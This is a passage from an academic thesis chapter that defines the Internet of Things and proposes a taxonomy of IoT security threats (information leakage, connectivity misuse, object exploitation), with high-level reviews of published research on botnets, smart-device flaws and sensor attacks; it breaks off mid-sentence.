The IoT represents the expansion of the Internet from digital into physical spheres. In this evolvement, security is one of most crucial requirements. However, the selection of suitable security measures is not trivial and requires in-depth knowledge about threats that could affect IoT systems. In this chapter, we present background and related work in the form of a taxonomy for IoT security threats. We extend this taxonomy with case studies in the subsequent three chapters. The objective is to gain a comprehensive understanding of the IoT threat landscape.

Contents

2.1 Understanding the Internet of Things ...... 13 2.1.1 Application-Level Perspective ...... 14 2.1.2 System-Level Perspective ...... 17 2.1.3 Network-Level Perspective ...... 18 2.2 Threat Classification Taxonomy for the Internet of Things .... 19 2.2.1 Threats of Information Leakage ...... 21 2.2.2 Threats of Connectivity Misuse ...... 23 2.2.3 Threats of Object Exploitation ...... 25

2.1 Understanding the Internet of Things

The term ‘Internet of Things’ was introduced rather as a marketing buzzword [16] than a technical terminology. Therefore in this background section, we start with clarifying what the IoT is to raise the understanding for the subsequent threat classification. The Merriam Webster dictionary [202] defines IoT as “the networking capability that allows information to be sent to and received from objects and devices using the Internet”. The Oxford dictionary [228] describes IoT as “the interconnection via the Internet of computing devices embedded in everyday objects, enabling them to send and receive data”. The Cambridge dictionary [37] refers to IoT as “objects with computing devices in them that are able to connect to each other and exchange data using the internet”. Gartner [100] states, “the Internet of Things is the network of physical objects that contain embedded technology to communicate and sense or interact with their internal states or the external environment”.

13 2 Background and Related Work

Although these definitions vary from each other, there are four common properties as illustrated in Figure 2.1: First, the IoT consists of objects, which means that IoT nodes have a physical appearance, and the plural indicates that a single object does not fulfill the requirements of being IoT. Second, the collection, storage, and processing of data is an essential part for IoT applications. Third, these objects provide connectivity with each other such that they can exchange information and fulfill tasks. Fourth, the connections between objects may also utilize the Internet as a communication medium.

Figure 2.1: Compact system model of the IoT.

In an effort to define the IoT, an initiative of the Institute of Electrical and Electronics Engineers (IEEE) issued an 86-page document [205]. They conclude that a comprehensive definition is not easy to find, and that many existing definitions are biased towards prop- erties emphasized for the specific context, in which the definition is used. In their attempt of a context-neutral definition, a list of features of the IoT is compiled and afterwards in- tegrated into a comprehensive definition: “Internet of Things envisions a self-configuring, adaptive, complex network that interconnects ‘things’ to the Internet through the use of standard communication protocols. The interconnected things have physical or vir- tual representation in the digital world, sensing/actuation capability, a programmability feature and are uniquely identifiable. The representation contains information including the thing’s identity, status, location or any other business, social or privately relevant information. The things offer services, with or without human intervention, through the exploitation of unique identification, data capture and communication, and actuation ca- pability. The service is exploited through the use of intelligent interfaces and is made available anywhere, anytime, and for anything taking security into consideration” [205, p.74]. In this work, we do not intend to propose another definition of the IoT. We rather introduce distinct perspectives on IoT systems as starting points to understand the extent and diversity of IoT systems.

2.1.1 Application-Level Perspective

From the application perspective, envisioned objectives of the IoT are to save energy, to optimize and automate processes, as well as to enhance life and comfort. To achieve

14 2.1 Understanding the Internet of Things this vision, existing applications experience a “smartification”, i.e., adding some kind of automation processes, intelligence, or just an interface for the user to control the object from a mobile device. As illustrated in Figure 2.2, IoT applications can be categorized as IoT applications in public, private, and industrial spaces. This categorization high- lights sample applications that are of further interest in this thesis and does not aim for completeness.

Figure 2.2: Categorization of sample IoT applications.

IoT Applications in Public Spaces. In the 20th century, the trend of urbanization led to the abandonment of rural areas by people that aim to live in larger cities and metropolises. These urban areas are commonly seen as provider for a better quality of life in terms of education, work, and social life [50]. Unfortunately, the growth of urban areas has significant downsides: The concentration of a large population leads to a high consumption of energy and natural resources, as well as to ecological problems for the environment and climate. To mitigate the problems of urban growth, the concept of smart cities was introduced and adopted by many institutions including regional and national governments. Smart cities can be realized by leveraging IoT technology complemented by big data analysis and real time control to enable intelligent services and resource allocation to ultimately achieve energy efficiency and sustainability [323]. For this, ubiquitous sensing networks are deployed in urban areas to collect information about energy consumption, air pollution, and the environment. IoT infrastructures are facilitated to send collected sensor data to a central entity for data processing and analysis. A smart city may offer a number of sub-applications, which make use of the ubiqui- tous sensing capabilities, IoT infrastructures, and computational resources. These sub- applications are categorized differently in the literature. In this work, we utilize a clas- sification scheme adopted by Zhang et al. [323] that splits smart city applications into following sub-categories1:

• Smart Energy: In order to examine the energy usage, the generation, distribution, and consumption of energy is continuously monitored. The goal is to protect against power

1 We omit smart industry, as we present this category as IoT application in the industrial space.

15 2 Background and Related Work

outages as well as to increase the overall energy efficiency of public infrastructure by identifying energy saving capabilities.

• Smart Environment: To enhance sustainability in the urban environment, myriads of sensors record the emission of greenhouse and waste gases, air and water pollution, noise levels, and vegetation.

• Smart Living: To maximize comfortable living in smart cities, a number of community services, such as intelligent parking allocation, are offered.

• Smart Service: Smart services comprise a number of services by public facilities, e.g., public transportation, provision of road traffic information, or touristic information.

The transformation of urban areas into smart cities is currently evolving in many countries. One of the first pilot cities was Santander [257] in Spain, which is an experimental test facility for smart city research. In last years, many cities around the world started the development towards becoming a smart city.

IoT Applications in Industrial Spaces. The technology trends in manufacturing head to- wards a miniaturization of computing devices, an increasing implementation of automa- tion techniques, and processes aided by vast amounts of sensors data. The objectives of enhanced manufacturing processes are shorter development cycles (i.e., faster time-to- market), higher flexibility in productions including the individualization of products on demand, decentralization and self-organization of manufacturing systems, as well as an increasing efficiency and sustainability [170]. IoT applications in industrial spaces are often referred to as Industry 4.0. This term was originally created as headline for the high-tech strategy of the German government [147] that promoted the advanced digitalization in manufacturing as the 4th industrial revolution. Synonyms such as smart factory or smart industry describe the same paradigm that facilitates smart objects and the IoT in an industrial context.

IoT Applications in Private Spaces. Private spaces equipped with home automation appli- cations are often referred to as smart homes. The goal of IoT systems in private spaces is to increase the quality of life, comfort, security, and energy efficiency. Prominent examples of such applications are intelligent heating and air conditioning as well as Internet-connected home appliances, entertainment, or lighting systems. A special aspect of IoT applica- tions in private spaces are privacy concerns that are of higher importance than in public or industrial spaces. Activities in private spaces might be sensitive, and therefore, their protection is considered a universal human right [294, Art.12]. IoT objects in private spaces are often referred to as IoT consumer products, which cur- rently comprise the largest portion of installed IoT objects among all spaces. With an estimated installed base of 12.9 billion units in 2020 [99], the market for IoT consumer products, i.e., IoT applications in private spaces, is larger than for IoT applications in public and industrial spaces with an installed base of 7.5 billion units.

16 2.1 Understanding the Internet of Things

2.1.2 System-Level Perspective

Besides focusing on applications, the IoT can be described as a system consisting of a number of interacting layers. In the literature on IoT architectures [20, 308], a plethora of multi-tiered models exists with varying numbers and definitions of layers. The classic architectural model originates from the concept of sensor networks and consists of three layers: Perception, network, and application. More advanced models add further layers for middleware and business elements.

Figure 2.3: Different architectural system models of the IoT.

In Figure 2.3, we illustrate the classic sensor network architecture as well as three promi- nent examples of architectural system models by the IEEE as well as Intel and Cisco. The IEEE introduced the working group P2413 that defines a standard for an architectural framework for the IoT. The P2413 document [205] describes the IoT as a three-tiered architecture with layers called sensing, networking and data communication, and appli- cation. In another reference model, Intel describes the IoT as a six-layer architecture. The layers are denoted from bottom to top as communications and connectivity, data, management, control, application, business [137]. Cisco provides an IoT reference model that considers the architecture of the IoT consisting of seven layers. The layers are from the bottom to the top: Physical devices and controllers, connectivity, edge computing, data accumulation, data abstraction, application, collaboration and processes [48]. In summary, the IoT lacks a unified or de-facto architectural system model. Existing

17 2 Background and Related Work models vary in the number of layers and definitions, highly depending on the context in which the model is used. While some emphasize the origin of the IoT as successor of sensor networks, others highlight data analysis capabilities or business use cases.

2.1.3 Network-Level Perspective

Another view on the IoT can be drawn from the network perspective. The IoT consists of billions of interconnected objects that highly differ in properties such as size, power consumption, interfaces, computational power, routing functionality, and supported net- work protocols. Objects usually communicate via wireless communication and belong to a cluster of nodes, denoted as network, that are deployed in the same geographical area and exchange data over a standardized protocol.

Table 2.1: Classification of wireless IoT network types. Wireless Range Bandwidth Short Medium Long Wireless Body Wireless Personal Low-Power Wide Low Area Networks Area Networks Area Networks (WBANs) (WPANs) (LPWANs) Wireless Local High - Area Networks Cellular Networks (WLANs)

As shown in Table 2.1, common types of IoT networks can be categorized according to their wireless range and bandwidth:

• Wireless body area networks (WBANs) use narrow-range communication of a few me- ters and enable the networking of wearable objects, e.g., medical implants, body sen- sors, and smart watches. Typical examples of a WBAN standards for IoT applications are Bluetooth Low Energy [27] and IEEE 802.15.6 [166].

• Wireless personal area networks (WPANs) are low-power wireless networks for inter- connecting objects in primary private spaces (e.g., a household). This type of network aims for very low power consumption that allows objects to run on batteries for a couple of years. A prominent example of a WPAN technology is IEEE 802.15.4 [136], which provides the physical and link layer for network standards such as ZigBee [330, 332] and 6LoWPAN [287].

• Low-power wide-area networks (LPWANs) supply broader geographical areas with wireless communication. LPWANs have a wireless range of a few kilometers and op- erate at a very low bandwidth. Therefore, they are especially suited for machine-to- machine (M2M) applications and sensor networks that require data transmissions of

18 2.2 Threat Classification Taxonomy for the Internet of Things

rather long intervals. In LPWANs, objects connect to routers (also known as gateways) that are connected to the Internet. Predictions [190] say that LPWANs will surpass cellular networks in terms of M2M communication within the next years. Typical examples of LPWAN standards are LoRaWAN [288] and SigFox [98].

• Wireless local area networks (WLANs) are widely known for its ability of intercon- necting personal computers and mobile devices but these networks can also be used to integrate IoT objects that have a constant power supply. Using an access point (also referred to as gateway or home router), the nodes in the network can connect to the Internet. WLANs are optimized for a high data throughput and short latency, and thus, the radio interfaces consume far more energy than low-bandwidth IoT standards. The IEEE 802.11 standard family [55] (also often referred to as Wi-Fi) is the de-facto technology for realizing WLANs.

• Cellular networks cover a wide geographical area that are divided in so-called cells. Thereby each cell has at least one transceiver, also known as base station, at a fixed location that provides wireless connectivity for objects within the cell. To prevent in- terference, a cell typically uses a different set of frequencies than its neighboring cells. Cellular networks were originally designed for high-bandwidth data transmissions in mobile telephony applications. Nevertheless, these networks can also be utilized for M2M communication as these technologies provide a broad global coverage. Stan- dardized technologies that utilize cellular networks are GSM [239], UMTS [131], and LTE [17].

As we focus on wireless communication in the IoT, we note that wired networks are only used very rarely in IoT scenarios. In general, wired communication does not conform to the IoT vision of large distributed networks, and therefore, they are out of the scope of this thesis.

2.2 Threat Classification Taxonomy for the Internet of Things

In the literature, numerous methodologies have been proposed to elicit and categorize security threats, ranging from simple brainstorming techniques to strict step-by-step pro- cedures. One of the most prominent systematic approaches is the STRIDE threat classifi- cation by Microsoft [290, 268], which assigns threats to the categories spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privilege. Another classification model by Wuyts [316] that focuses specifically on privacy threats is LIND- DUN, a mnemonic for the threat categories linkability, identifiability, non-repudiation, detectability, disclosure of information, unawareness, and non-compliance. STRIDE and LINDDUN are designed for security and privacy in traditional computing scenarios but unfortunately they cannot be applied to the IoT context. The large diversity in capa- bilities and the wide-spread distribution of objects in IoT systems adds another level of complexity to IoT threats, which cannot be represented by these schemes. In this work,

19 2 Background and Related Work we aim for a threat categorization technique that allows to comprehensively categorize all kinds of known and upcoming threats in the context of the IoT into intuitive threat classes. Adapting the definition of security threats by Abomhara and Koien [1] to the IoT, we define an threat for an IoT system as an action that takes advantage of data, objects, or connectivity in IoT systems, which results in a negative impact for this system or third-parties. Furthermore, we define a system according to Avizienis et al. [18, p.12] as an “entity that interacts with other entities, i.e., other systems, including hardware, software, humans, and the physical world with its natural phenomena”.

Figure 2.4: Threat categories according to the system model of the IoT.

As shown in Figure 2.4, we identify three distinct threat categories that apply to the IoT: The threat of information leakage, the threat of connectivity misuse, and the threat of object exploitation. Referring to our definition of IoT threats, the threat of information leakage is an action that takes advantage of collected, transmitted, processed, and stored data of an IoT system and has a negative impact on this system or third-parties. In contrast, the threat of connectivity misuse is an action that takes advantage of the inter- connectivity of IoT systems and has a negative impact on these systems or third-parties. Finally, the threat of object exploitation is an action that takes advantage of security vulnerabilities in IoT objects and has a negative impact on this system or third-parties. We performed a literature review, in which we categorized IoT-related threats and attacks that have been published in the academic security community. For this, we looked at the proceedings of the twenty major academic security conferences2. Using the search function of the DBLP Computer Science Bibliography3, we looked for IoT-specific key- words, e.g., ‘IoT’, ‘thing’, ‘smart’, ‘CPS’, ‘cyber’, ‘sensor’, IoT-related technologies, e.g., ‘Wi-Fi’, ‘Bluetooth’, ‘ZigBee’, ‘Zwave’, ‘LoRa’, or IoT-related network models, e.g., ‘LP- WAN’, ‘WPAN’, ‘WBAN’, in the titles of publications. Finally, we examined all candidate publications whether they actually describe an IoT-related threat or attack and then cate- gorized them according to the proposed threat taxonomy. Further publications exist that discuss security and privacy in the realm of the IoT, but we excluded them as they do not present new threats and attacks.

2 Source: http://jianying.space/conference-ranking.html (Ranking of 2018) 3 Online available at https://dblp.uni-trier.de/

20 2.2 Threat Classification Taxonomy for the Internet of Things

2.2.1 Threats of Information Leakage

Data, the carrier of information, is an essential building block of the IoT. Data is mainly generated through human interaction with objects or through measuring properties of the physical environment with any kind of sensor. The gathered data is transmitted between objects and often collected, stored, and processed on central data servers, often also referred to as cloud. From a conceptual view, objects serve as data sources, while the data servers act as data sinks. Data is transmitted between sources and sinks using the networking capabilities of the IoT. Many IoT applications collect massive amounts of data in order to provide smart services. For example, a smart heating system needs to measure the room climate in short time intervals such that the output of the heating system can be regulated in real time. Al- though most kinds of data seem only meaningful for their specific application, they often contain more information than realized at the first sight. In the example of a smart heat- ing application, the data collected by a temperature sensors can also be used to detect occupancy and activities in private spaces. Therefore, if malicious actors have access to collected data, these entities can misuse them for various purposes.

Characterization. Threats classified as information leakage are characterized by their need of data collections, which could be obtained legally or illegally by the attackers. This class of threats is considered to be object-agnostic, i.e., the functionality of the data- collecting objects is of no concern. If the analyzed data is mainly collected from objects in private spaces, the threats are then often related to privacy violations or surveillance. In industrial and military contexts, data is usually analyzed to identify deployments, configurations, and the states of IoT objects.

Attacker Model. The objective of the attackers is to retrieve sensitive or valuable infor- mation from the data that they have access to. We assume that the attacker has access to data collections of relevant IoT systems. Thus, following types of attackers can be considered for this class of threats:

• Service Providers offer smart services and often have direct access to their customers’ data, while the chance of getting caught is relatively low. As information are valuable, the temptation exists to analyze the collected data without consent, e.g., to make customized offers to the users. Also, the collected data can be sold to third parties that further use them for other non-consensual purposes.

• Government agencies might get lawful access to data that is stored within their juris- diction. The motivation might be to conduct surveillance or to gain digital evidence for persecution. Also governmental agencies might use data collected from foreign IoT systems for espionage or other economic and military advantages.

21 2 Background and Related Work

• Third-party analytics providers have a business model that analyzes collected data for purposes that might be undesired by the consumers. Analytic providers usually pur- chase access to data, either legally from service providers or illegally through malicious insiders or the underground economy. These results of their analyses can later be used for consumer profiling, customized advertising, and others.

Related Work. As massive amounts of data are collected by IoT applications in private spaces, unauthorized access or non-consensual analysis of this data invades the privacy of users. Zhang et al. [325] described the huge amounts of personal data as a particu- lar threat that arises from the IoT ecosystem in private homes. This data may reveal sensitive information about users, such as geographical location, health status, and living habits. The authors recognize identity management and authentication of IoT objects as key issues to ensure a secure communication of data that prevents the leakage of sensitive information. De et al. [59] analyzed the privacy harm in smart grids as data collected by smart meters can be used to create very accurate profiles of human activities. These ac- tivities, e.g., sleeping patterns, time of absence, usage of electronic devices, can be used by a number of entities such as marketing companies, governmental agencies, and criminals. Celik et al. [41] investigated the privacy in IoT consumer applications by analyzing data flows of sensitive information between sources, e.g., sensors or object states, and sinks, e.g., Internet connections. The authors proposed a static taint analysis tool, which translates platform-specific source code into an intermediate representation, searches for sensitive sources and sinks, and finally identifies sensitive data flows. The authors evaluated their approach with the analysis of a few hundred IoT mobile device apps of popular IoT con- sumer products. Copos et al. [53] analyzed the traffic generated by smart home devices. Based on the metadata, they could retrieve sensitive information, such as events inside the property and which models of IoT objects are installed. Bastys et al. [22] investigated the threat of private data exfiltration through applets from trigger-action platform, such as IFTTT, or Microsoft Flow. The authors measured that around 30% of the almost 280k analyzed IFTTT applets are suspected to be used for privacy-related attacks by malicious applet makers. Attackers might analyze collected data to identify the specific devices that are installed in IoT systems. This so-called fingerprinting of IoT objects might be the first step to identify vulnerable devices and can be seen as a preparation for device-specific attacks. On the contrary, fingerprinting techniques can also be facilitated by system administrators to manage the undocumented growth of the installed base of IoT objects. Das et al. [56] explored the threat of identifying IoT objects through fingerprinting the imperfections in microphones and speakers of IoT objects. In the evaluation, they showed that they can identify the manufacturer as well as determine whether two products belong to the same vendor and model. Fromby et al. [97] proposed further methods to fingerprint devices types with the overall goal to enhance intrusion detection mechanisms in industrial IoT networks. Feng et al. [89] proposed an approach to counter security challenges resulting from vulnerable, mismanaged, or misconfigured IoT objects by automatically discovering,

22 2.2 Threat Classification Taxonomy for the Internet of Things cataloging, and annotating IoT devices as first step of secure IoT device management. Their basic idea was to correlate communication protocol responses of IoT objects with online product descriptions to identify manufacturers and models of installed devices. Especially in an industrial and military context, sensor data about the state of ob- jects contain crucial information and should only be accessed by authorized entities. Lemaire et al. [174] outlined the threat of information leakage that occurs when indus- trial machines are monitored by sensors of third-party service providers for predictive maintenance, i.e., maintenance is performed on demand based on the sensed states of the machine’s components. As this maintenance approach involves a number of entities and the collected data might contain critical information about manufacturing processes, the leakage of them could undermine the security and safety of industrial processes. In Chapter 3, we present a case study that shows information leakage on the example of room climate data. We verify the long-hold belief that through analyzing collected temperature and humidity data, attackers are able detect the presence of occupants as well as recognize activities.

2.2.2 Threats of Connectivity Misuse

IoT infrastructure is continuously rolled out world-wide to provide connectivity for IoT objects. This infrastructure is deployed either by public institutions under governmental supervision, or without governmental control by private entities. Either way, the con- nectivity that allows millions of objects to be interconnected and accessed through the Internet can be misused for malicious purposes. Thus, we define the threat of connectivity misuse as the second IoT threat category.

Characterization. Threats that are classified as connectivity misuse are characterized through exploiting connectivity of IoT infrastructures for malicious purposes. Exploiting the connectivity means that the functionality of the compromised objects is secondary and collected data is usually not of interest. The misuse of connectivity is impactful because it consolidates the power of a large crowd of IoT objects to achieve a common goal. In addition, connectivity misuse allows for remotely-controlled attacks in places where such an attack has not been possible before due to the lack of a communication medium between the targeted system and the attacker.

Attacker Model. The objectives of the attackers are to facilitate the connectivity of the IoT infrastructure for attacks. In general, following malicious actors might have a motivation for connectivity misuse:

• State-sponsored attackers, which includes domestic governmental agencies as well as foreign state actors, have large resources for attacks that misuse global IoT infrastruc- tures. Domestic governmental agencies can get lawful access to IoT infrastructures

23 2 Background and Related Work

that are located within their jurisdiction. The motivation might be, e.g., to weaponize IoT objects in botnets for military, political, or economic considerations.

• Cyber vandals and activists usually have no distinct goal others than to bring large damage for either self-affirmation, competition, or political motives. These groups have usually no legitimate access to IoT objects and only limited financial resources. Examples of such actors are paramilitary organizations that engage in cyber warfare against political opponents, media websites, and human rights groups.

• Cybercrime organization use illegitimate access to IoT objects to bribe their owners or third parties. In contrast to cyber vandals and activists with political agendas, the ac- tions of cybercrime organizations are mainly motivated by financial profits, to damage their competitors, or to hide their traces to avoid prosecution by law-enforcement.

Related Work. A prominent example of connectivity misuse are the botnet attacks in 2016 that used weakly configured IoT objects to facilitate large-scale denial-of-service attacks against Internet services, such as DNS provider Dyn, GitHub, Netflix, and others. As a widely-recognized case of a new class of powerful botnets, Mirai attracted attention in the academic community. Antonakakis et al. [12] presented an in-depth analysis of the emergence and activities of the Mirai botnet, the affected products, and its victims. Kolias et al. [157] described the operation, communication, and variants of the Mirai botnet. Sinanovic and Mrdovic [273], Hallman et al. [116], and De Donno et al. [66] reviewed the leaked source code of Mirai. However, Mirai is by far not the only botnet that leverages the power of thousands of IoT objects. Vervier and Shen [300] investigated the landscape of IoT botnets in terms of how devices are compromised and infected, as well as how are botnets are monetized. For this, they set up honeypots of IoT objects and collected data over the course of a couple of months. The authors concluded that (as of summer 2018) the family of Mirai botnet variants is still most dominant in the IoT botnet ecosystem. Nevertheless, there are other botnets, such as IoT Reaper and , which are becoming more and more dangerous. Lyu et al. [189] examined the possibility of reflective DoS attacks that abuse IoT objects as reflectors. The basic idea is that the attackers send a short request from a spoofed source IP address to the IoT objects, which reply with a long response to the spoofed IP address. These DoS attacks can have a massive effect on the victim’s system. The authors investigated the reflective capabilities of several IoT consumer products and demonstrated the feasibility of this threat. Torabi et al. [289] gathered empirical data about IoT-related malicious activities from passive measurements of network telescopes. This way, the authors exposed traffic, sources, targeted ports and protocols about thou- sands of compromised IoT objects. In addition, they revealed previously unknown variants of malware families that target IoT systems. Moreover, the power of IoT botnets can be leveraged for severe attacks on critical infras- tructure. Soltan et al. [275] analyzed the threat of botnets consisting of a large number high-wattage IoT objects being abused in a coordinated attack to damage the power grid of

24 2.2 Threat Classification Taxonomy for the Internet of Things the geographical region, in which the objects are located. The results of such coordinated attacks can be drastic, ranging from increasing operating costs, line failures, to large-scale blackouts. The authors performed various simulations and concluded that 18,000 electric water heaters under the control of a botnet would be enough to cause frequency instability, potentially leading to a blackout in a whole region. Another threat of connectivity misuse is malware that spreads over the air interfaces of IoT objects. Ronen et al. [248] discussed the threat of a worm that infects IoT devices automatically and can spread over whole cities that have a high density of vulnerable IoT objects. The authors claimed that this threat can be initiated by plugging-in a single infected IoT object and quickly spreads over a whole city using wireless low-power com- munication. This communication medium is not under regulatory control, in comparison, e.g., to cellular networks. Depending on the capabilities of the infected IoT objects, such an attack can lead to a massive disturbance, blackouts, or other malicious actions. The connectivity of IoT infrastructures can also be used to remotely control malicious hardware over the Internet. In Chapter 4, we present a case study where IoT infrastructure is misused to provide a communication channel for attackers to command and control malicious hardware elements, even if the attacked device itself does not have a network interface.

2.2.3 Threats of Object Exploitation

IoT objects are the physical extension of the Internet into the real world that engage with humans, the environment, and other objects. On the surface, a wide variety of IoT objects exist, ranging from tiny sensing devices to large industrial machines. Depending on their intended application, IoT objects comprise a set of sensors, actuators, and displays. These components make them an attractive target for malicious misuse. As objects may be deployed in safety- or security-critical settings, an attacker might be interested to misuse objects to tamper with safety and security features in these applications. Therefore, we define exploitation of objects as the third IoT threat category.

Characterization. Threats classified as object exploitation have an impact onto the physical world in the proximity of the IoT object. These effects are object- and application- specific as they highly depend on the functional features of the exploited objects. Threats categorized as object exploitation have rather a local than a global impact. Comparing the threats of object exploitation and connectivity misuse, connectivity misuse is based on the power of large number of IoT objects rather than a few ones. In contrast, the exploitation of objects is characterized by the fact that the capabilities of an object itself are attacked. This does not mean that only a single object is attacked.

Attacker Model. For threats classified as object exploitation, we assume that attackers exposed a way to interfere with the functionality of the object. The general objectives of

25 2 Background and Related Work the attackers might be to cause application-specific harm that can either affects the users, the environment, or the applications itself. Similar to the threat of connectivity misuse, we identified three malicious actors that might have a motivation of exploiting IoT objects:

• State-sponsored attackers, which includes domestic governmental agencies as well as foreign state actors, have large resources to find vulnerabilities and exploits in IoT systems. Furthermore, government agencies can force entities within their jurisdiction to grant lawful access to IoT objects.

• Cyber vandals and activists have no distinct goal others than to bring damage for self- affirmation, competition, or political motives. These groups have usually no legitimate access to IoT objects and only limited financial resources.

• Cybercrime organization use illegitimate access to IoT objects to bribe or force the owners or third parties. In contrast to cyber vandals and activists, the actions of cy- bercrime organizations are mainly motivated by gaining economic benefits, to damage their competitors, or to hide their traces to avoid persecution by law-enforcement.

Related Work. An attractive target for attacks are smart meters as the exploitation of these IoT objects may yields direct financial advantages. Mashima and C´ardenas[194] discussed the threat of electricity theft in smart grids, which results from vulnerable smart meters. For this, they introduced a threat model and evaluated the performance of electricity-theft algorithms. Liu et al. [182] described the threat of malicious data injec- tions in smart grids as this allows attackers to gain financial benefits or to mislead control entities to take erroneous actions, which could violate the stability of the power systems. Also, intelligent applications in smart cities will increasingly become target of malicious actors, if it will benefit them. Chen et al. [46] analyzed the security of traffic signal control systems, which are increasingly deployed in the context of smart cities. They found that a single attack vehicle can use data spoofing to delay traffic on an intersection significantly. Industrial IoT applications are also offering a large surface for attacks. Fachkha et al. [80] analyzed network traffic, retrieved from network telescope data, to monitor malicious ac- tivities that try to compromise protocols of industrial IoT applications. The authors’ goal was to learn more about threats against industrial control systems to get a comprehensive understanding of the attackers’ goals and strategies. Bolshev et al. [28] argued that de- sign flaws in industrial IoT applications are much harder to resolve than implementation bugs. According to the authors, the hunt for design flaws usually cannot be automated as the specific environment of the industrial IoT application, in which the application is deployed, has to be considered as well. IoT consumer products enrich our lives in many ways but can also become a threat if they are controlled by malicious actors. The threats depend highly on the functionality and use cases of the IoT objects. Denning et al. [62] analyzed the landscape of attacks against interconnected devices in smart home ecosystem. Bachy et al. [19] investigated the

26 2.2 Threat Classification Taxonomy for the Internet of Things security of smart TVs and concluded that powerful attacks are possible, which allow for the remote exploitation of software vulnerabilities over the Internet. For this, they presented the concept of an attack that uses the Digital Video Broadcasting (DVB) channel as entry point to open specific ports on a smart TV. While some IoT consumer products are mainly intended for entertainment, others are significantly more security-critical, e.g., smart door locks and smart intruder alarm sys- tems. Ho et al. [127] investigated the security of smart door locks and exposed design and implementation flaws. Exploiting these weaknesses, an attacker is able to gain access to the victim’s home as these locks facilitate automatic unlocking protocols, which could also unlock the door by accident or in the presence of an attacker. Ye et al. [321] described further attacks against smart door locks. The authors were able to extract key material in order to take control over smart door locks, to retrieve private information about the locks’ owners, as well as to disable them completely. As even children and adult toys are getting connected to the Internet, they attract ma- licious actors. Valente and C´ardenas[295] showed privacy, safety, and security problems with smart toys that are intended to interact with children. In a case study, the authors exposed vulnerabilities in such toys and describe how attackers can inject own audio files to be listened by the children. Wynn et al. [317] analyzed insecurities in a number of Internet-connected vibrators. They describe the threat of remote sexual assault, i.e., an attacker could remotely control a sex toy while it is in usage, which can harm the user physically and psychologically. The authors concluded that the security and privacy of such devices has to be held to a higher standard than average IoT consumer devices. The ecosystem of IoT consumer products is accompanied by online services that are allowed to control IoT objects. Fernandes et al. [93] analyzed security risks of trigger-action platforms, which are web services that allow users to define automation rules. These rules trigger actions at IoT objects, e.g., let light bulbs blink, as a result of a pre-defined event, e.g., receiving an email. To function properly, these platforms need privileged access to the user’s online services and IoT objects, which creates new challenges from a security point of view. The authors examined existing trigger-action platforms and conclude that these applications are over-privileged, such that attackers can utilize them for malicious purposes. IoT objects might also be installed in security-sensitive areas with restricted access, where attackers can use them to exfiltrate or hide information. Ronen et al. [249] analyzed smart lighting devices and presented attacks in which the legitimate functionality of these objects is misused for malicious purposes. For example, the authors implemented a system that uses regular smart lights to exfiltrate data from highly-protected areas by capturing the light from a larger distance. Furthermore, they discuss how an attacker could use strobe lighting effects of these IoT objects to trigger seizures in epilepsy patients. A large portion of IoT applications rely on sensing capabilities of the IoT objects to measure physical properties. If sensor values are manipulated, it can have a severe con- sequences, even on human health. Park et al. [231] presented a sensor spoofing attack

27 2 Background and Related Work on medical devices, in particular on a medical infusion pump. In this spoofing attack, denoted as saturation, an attacker uses an additional infrared source to manipulate the amount of injected medicine. As a result, the attacker can achieve an over- or under- infusion, which can result in severe consequences for the patient. Tu et al. [292] showed that sensors can be manipulated using out-of-band signal injections. More precisely, the authors demonstrated attacks against inertial sensors, which consist of gyroscope and ac- celerometer, through the injection of acoustic signals. The attack threatens applications that highly rely on these kind of sensors, e.g., the flight stabilization of drones, user view in virtual-reality systems, or location services in navigation systems. Krotofil et al. [162] discussed the threat of jamming communication channels to prevent sensor data from be- ing transmitted to a controller. If these denial-of-service attacks are precisely timed, then they can have a highly destructive impact on the system. The origins of vulnerabilities in IoT objects are often basic design flaws and implementa- tion bugs. Notra et al. [221] showed that popular IoT consumer products communicate with each other in plaintext, and therefore, are subject for spoofing and man-in-the-middle attacks. Pa et al. [229] observed a large increase of attacks against IoT devices over the In- ternet that use the antiquated Telnet protocol. To analyze these attacks, they implemented a honeypot that acted as an IoT object to collect data about Telnet-based intrusions. Im- plementation bugs in the firmware of IoT devices are an attractive target for attacker as such bugs might allow the take-over of objects and whole systems. Chen et al. [45] addressed this issue by designing a tool that automatically detects memory corruption bugs in the IoT objects. Their tool does not require a firmware image as input but uses the end user’s smartphone app to automatically send commands to the IoT devices while mutating the data fields of these messages. The authors demonstrated the feasibility of their approach by discovering several previously undisclosed memory corruption bugs in a number of IoT consumer products. Due to the nature of the IoT ecosystem, the root cause of malicious misbehavior in an IoT system might be hard to identify as such a system usually consists of various devices and applications that are somehow chained together. This leads to the state where audit logs are siloed on several objects and platforms, and therefore, malicious events cannot be easily reconstructed. Wang et al. [306] proposed and evaluated a platform-centric approach that tackles this issue. In the IoT ecosystem, many objects routinely interact and access resources of each other. This leads to the threat that over-privileged applications can be misused by malicious entities. Ferandes et al. [91] statically analyzed the source code of hundreds of smart home apps that are associated to a popular smart home system. They revealed design flaws of over-privileged applications as a result of too coarse-grained permissions, as well as the insufficient protection of sensitive information. These security weaknesses can be exploited in security-critical objects, which could heavily concern the residents’ security as they allow for break-ins, vandalism, and robberies of private spaces. Sikder et al. [272] explored the threat that permissions for accessing sensor data of smartphones is often granted by default or only requested once during the installation of an app. However,

28 2.2 Threat Classification Taxonomy for the Internet of Things sensor data can be misused in various scenarios, e.g., to trigger malware on the device, to exfiltrate data, or to gather sensitive information about the user’s activities. The authors presented an intrusion detection system that observes the usage of sensor data on mobile devices. Although the authors focus on mobile platforms, the presented threats also apply to IoT objects in general. Jia et al. [145] also discussed the threat of design flaws in the permission models of IoT platforms that are controlled with mobile device apps. This threat arises from the fact that users make uninformed decisions during installation, as well as that the users are forced at runtime to make security-related decisions without being informed about the essential context of their decisions. This allows malicious apps to interfere with the users’ IoT objects. The authors proposed a new framework that resolves these issues by providing users with context-rich information such that they can make informed access control decisions. Sivaraman et al. [274] described the threat of a malware-equipped mobile device app that searches for vulnerable IoT objects within the local home network. This way, the attacker can circumvent the “isolation” of the residential IoT objects through the home router, which usually does not translate the private IP addresses of smart home devices into public IP addresses. Relying on this “isolation”, many smart home devices communicate unprotected within the local network, which leads to the consequences that this communication is vulnerable to malware-infected mobile devices within the same network. The vast majority of IoT objects communicates wirelessly. Thus, the over-the-air data transmissions are also attractive targets for attacks. Kim et al. [152] formally evaluated the impact of DoS attacks on IoT protocols, such as Sigfox, LoRa, JPAKE, MQTT, and CoAP. They concluded that the majority of IoT protocols is vulnerable to DoS attacks, which could lead to massive disruptions of IoT systems. Shreenivas et al. [269] discussed security threats in the routing of wireless low-power networks and present an 